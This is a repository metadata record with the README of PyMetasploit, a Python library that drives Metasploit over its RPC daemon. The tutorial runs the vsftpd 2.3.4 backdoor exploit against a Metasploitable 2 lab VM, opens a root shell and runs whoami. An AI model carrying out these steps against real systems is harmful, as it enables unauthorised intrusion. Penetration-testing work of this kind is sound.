{"id":13789509,"url":"https://github.com/allfro/pymetasploit","last_synced_at":"2025-05-12T06:31:39.338Z","repository":{"id":4035831,"uuid":"5136815","full_name":"allfro/pymetasploit","owner":"allfro","description":"A full-fledged msfrpc library for Metasploit framework.","archived":false,"fork":false,"pushed_at":"2021-08-31T18:48:19.000Z","size":80,"stargazers_count":303,"open_issues_count":22,"forks_count":138,"subscribers_count":25,"default_branch":"master","last_synced_at":"2025-04-20T09:55:50.985Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/allfro.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2012-07-21T20:58:38.000Z","updated_at":"2025-04-10T16:37:36.000Z","dependencies_parsed_at":"2022-07-12T23:10:34.655Z","dependency_job_id":null,"html_url":"https://github.com/allfro/pymetasploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/allfro%2Fpymetasploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/allfro%2Fpymetasploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/allfro%2Fpymetasploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/allfro%2Fpymetasploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/allfro","download_url":"https://codeload.github.com/allfro/pymetasploit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count"
:253687553,"owners_count":21947694,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-03T22:00:25.477Z","updated_at":"2025-05-12T06:31:39.059Z","avatar_url":"https://github.com/allfro.png","language":"Python","readme":"PyMetasploit - a full-fledged msfrpc library for Python\n-------------------------------------------------------\n\nPyMetasploit is a full-fledged `msfrpc` library for Python. It is meant to interact with the msfrpcd daemon that comes\nwith the latest versions of Metasploit. It does NOT interact with the console-based scripts that Metasploit provides\nsuch as msfconsole, msfvenom, etc. 
Therefore, before you can begin to use this library, you'll need to initialize\n`msfrpcd` and optionally (highly recommended) PostgreSQL.\n\n# Requirements\n\nBefore we begin, you'll need to install the following components:\n\n* **Metasploit:** https://github.com/rapid7/metasploit-framework\n* **PostgreSQL (Optional):** http://www.postgresql.org\n\nInstalling PostgreSQL is highly recommended as it will improve response times when querying `msfrpcd` (Metasploit RPC\ndaemon) for module information.\n\n# Tutorial\n\n## Starting `msfrpcd`\n\n`msfrpcd` accepts the following arguments:\n\n```bash\n$ ./msfrpcd -h\n\n   Usage: msfrpcd \u003coptions\u003e\n\n   OPTIONS:\n\n       -P \u003copt\u003e  Specify the password to access msfrpcd\n       -S        Disable SSL on the RPC socket\n       -U \u003copt\u003e  Specify the username to access msfrpcd\n       -a \u003copt\u003e  Bind to this IP address\n       -f        Run the daemon in the foreground\n       -h        Help banner\n       -n        Disable database\n       -p \u003copt\u003e  Bind to this port instead of 55553\n       -u \u003copt\u003e  URI for Web server\n```\n\nThe only parameter that is required to launch `msfrpcd` is the `-P` (password) parameter. This specifies the password\nthat will be used to authenticate users to the daemon. As of this writing, `msfrpcd` only supports one username/password\ncombination. However, the same user can log into the daemon multiple times. 
Unless specified otherwise, the `msfrpcd`\ndaemon listens on port 55553 on all interfaces (`0.0.0.0:55553`).\n\nFor the purposes of this tutorial let's start the `msfrpcd` daemon with a minimal configuration:\n\n```bash\n$ ./msfrpcd -P mypassword -n -f -a 127.0.0.1\n[*] MSGRPC starting on 0.0.0.0:55553 (SSL):Msg...\n[*] MSGRPC ready at 2014-04-19 23:49:39 -0400.\n```\n\nThe `-f` parameter tells `msfrpcd` to remain in the foreground and the `-n` parameter disables database support.\nFinally, the `-a` parameter tells `msfrpcd` to listen for requests only on the local loopback interface (`127.0.0.1`).\n\n## `MsfRpcClient` - Brief Overview\n\n### Connecting to `msfrpcd`\n\nLet's get started interacting with the Metasploit framework from Python:\n\n```python\n\u003e\u003e\u003e from metasploit.msfrpc import MsfRpcClient\n\u003e\u003e\u003e client = MsfRpcClient('mypassword')\n```\n\nThe `MsfRpcClient` class provides the core functionality to navigate through the Metasploit framework. Let's take a\nlook at its underbelly:\n\n```python\n\u003e\u003e\u003e [m for m in dir(client) if not m.startswith('_')]\n['auth', 'authenticated', 'call', 'client', 'consoles', 'core', 'db', 'jobs', 'login', 'logout', 'modules', 'plugins',\n'port', 'server', 'sessionid', 'sessions', 'ssl', 'uri']\n\u003e\u003e\u003e\n```\n\nLike the Metasploit framework, `MsfRpcClient` is segmented into different management modules:\n\n* **`auth`**: manages the authentication of clients for the `msfrpcd` daemon.\n* **`consoles`**: manages interaction with consoles/shells created by Metasploit modules.\n* **`core`**: manages the Metasploit framework core.\n* **`db`**: manages the backend database connectivity for `msfrpcd`.\n* **`modules`**: manages the interaction and configuration of Metasploit modules (i.e. 
exploits, auxiliaries, etc.)\n* **`plugins`**: manages the plugins associated with the Metasploit core.\n* **`sessions`**: manages the interaction with Metasploit meterpreter sessions.\n\n### Running an Exploit\n\nJust like the Metasploit console, you can retrieve a list of all the modules that are available. Let's take a look at\nwhat exploits are currently loaded:\n\n```python\n\u003e\u003e\u003e client.modules.exploits\n['windows/wins/ms04_045_wins', 'windows/winrm/winrm_script_exec', 'windows/vpn/safenet_ike_11',\n'windows/vnc/winvnc_http_get', 'windows/vnc/ultravnc_viewer_bof', 'windows/vnc/ultravnc_client', ...\n'aix/rpc_ttdbserverd_realpath', 'aix/rpc_cmsd_opcode21']\n\u003e\u003e\u003e\n```\n\nWe can also retrieve a list of `auxiliary`, `encoders`, `nops`, `payloads`, and `post` modules using the same syntax:\n\n```python\n\u003e\u003e\u003e client.modules.auxiliary\n...\n\u003e\u003e\u003e client.modules.encoders\n...\n\u003e\u003e\u003e client.modules.nops\n...\n\u003e\u003e\u003e client.modules.payloads\n...\n\u003e\u003e\u003e client.modules.post\n...\n```\n\nNow let's interact with one of the `exploit` modules:\n\n```python\n\u003e\u003e\u003e exploit = client.modules.use('exploit', 'unix/ftp/vsftpd_234_backdoor')\n\u003e\u003e\u003e\n```\n\nIf all is well at this point, you will be able to query the module for various pieces of information such as author,\ndescription, required run-time options, etc. Let's take a look:\n\n```python\n\u003e\u003e\u003e  print exploit.description\n\n          This module exploits a malicious backdoor that was added to the\tVSFTPD download\n          archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between\n          June 30th 2011 and July 1st 2011 according to the most recent information\n          available. 
This backdoor was removed on July 3rd 2011.\n\n\u003e\u003e\u003e exploit.authors\n['hdm \u003chdm@metasploit.com\u003e', 'MC \u003cmc@metasploit.com\u003e']\n\u003e\u003e\u003e exploit.options\n['TCP::send_delay', 'ConnectTimeout', 'SSLVersion', 'VERBOSE', 'SSLCipher', 'CPORT', 'SSLVerifyMode', 'SSL', 'WfsDelay',\n'CHOST', 'ContextInformationFile', 'WORKSPACE', 'EnableContextEncoding', 'TCP::max_send_size', 'Proxies',\n'DisablePayloadHandler', 'RPORT', 'RHOST']\n\u003e\u003e\u003e exploit.required # Required options\n['ConnectTimeout', 'RPORT', 'RHOST']\n```\n\nThat's all fine and dandy but you're probably really itching to pop a box with this library right now, amiright!? Let's\ndo it! Let's use a [Metasploitable 2](http://sourceforge.net/projects/metasploitable/) instance running on a VMWare\nmachine as our target. Luckily it's running our favorite version of vsFTPd - 2.3.4 - and we already have our exploit\nmodule loaded in PyMetasploit. Our next step is to specify our target:\n\n```python\n\u003e\u003e\u003e exploit['RHOST'] = '172.16.14.145' # IP of our target host\n\u003e\u003e\u003e\n```\n\nYou can also specify or retrieve other options as well, as long as they're listed in `exploit.options`, using the same\nmethod as shown above. For example, let's get and set the `VERBOSE` option:\n\n```python\n\u003e\u003e\u003e exploit['VERBOSE']\nFalse\n\u003e\u003e\u003e exploit['VERBOSE'] = True\n\u003e\u003e\u003e exploit['VERBOSE']\nTrue\n\u003e\u003e\u003e\n```\n\nAwesome! So now we're ready to execute our exploit. All we need to do is select a payload:\n\n```python\n\u003e\u003e\u003e exploit.payloads\n['cmd/unix/interact']\n\u003e\u003e\u003e\n```\n\nAt this point, this exploit only supports one payload (`cmd/unix/interact`). So let's pop a shell:\n\n```python\n\u003e\u003e\u003e exploit.execute(payload='cmd/unix/interact')\n{'job_id': 1, 'uuid': '3whbuevf'}\n\u003e\u003e\u003e\n```\n\nExcellent! It looks like our exploit ran successfully. How can we tell? 
The `job_id` key contains a number. If the\nmodule failed to execute for any reason, `job_id` would be `None`. For long running modules, you may want to poll the\njob list by checking `client.jobs.list`. Since this is a fairly quick exploit, the job list will most likely be empty\nand if we managed to pop our box, we might see something nice in the sessions list:\n\n```python\n\u003e\u003e\u003e client.sessions.list\n{1: {'info': '', 'username': 'ndouba', 'session_port': 21, 'via_payload': 'payload/cmd/unix/interact',\n'uuid': '5orqnnyv', 'tunnel_local': '172.16.14.1:58429', 'via_exploit': 'exploit/unix/ftp/vsftpd_234_backdoor',\n'exploit_uuid': '3whbuevf', 'tunnel_peer': '172.16.14.145:6200', 'workspace': 'false', 'routes': '',\n'target_host': '172.16.14.145', 'type': 'shell', 'session_host': '172.16.14.145', 'desc': 'Command shell'}}\n\u003e\u003e\u003e\n```\n\nSuccess! We managed to pop the box! `client.sessions.list` shows us that we have a live session with the same `uuid` as\nthe one we received when executing the module earlier (`exploit.execute()`). Let's interact with the shell:\n\n```python\n\u003e\u003e\u003e shell = client.sessions.session(1)\n\u003e\u003e\u003e shell.write('whoami\\n')\n\u003e\u003e\u003e print shell.read()\nroot\n\u003e\u003e\u003e # Happy dance!\n```\n\nThis is just a sample of how powerful PyMetasploit can be. Use your powers wisely, Grasshopper, because with great power\ncomes great responsibility – unless you are a banker.\n\n# Questions?\n\nEmail me at ndouba.at.gmail.com\n","funding_links":[],"categories":["Internet","Python"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fallfro%2Fpymetasploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fallfro%2Fpymetasploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fallfro%2Fpymetasploit/lists"}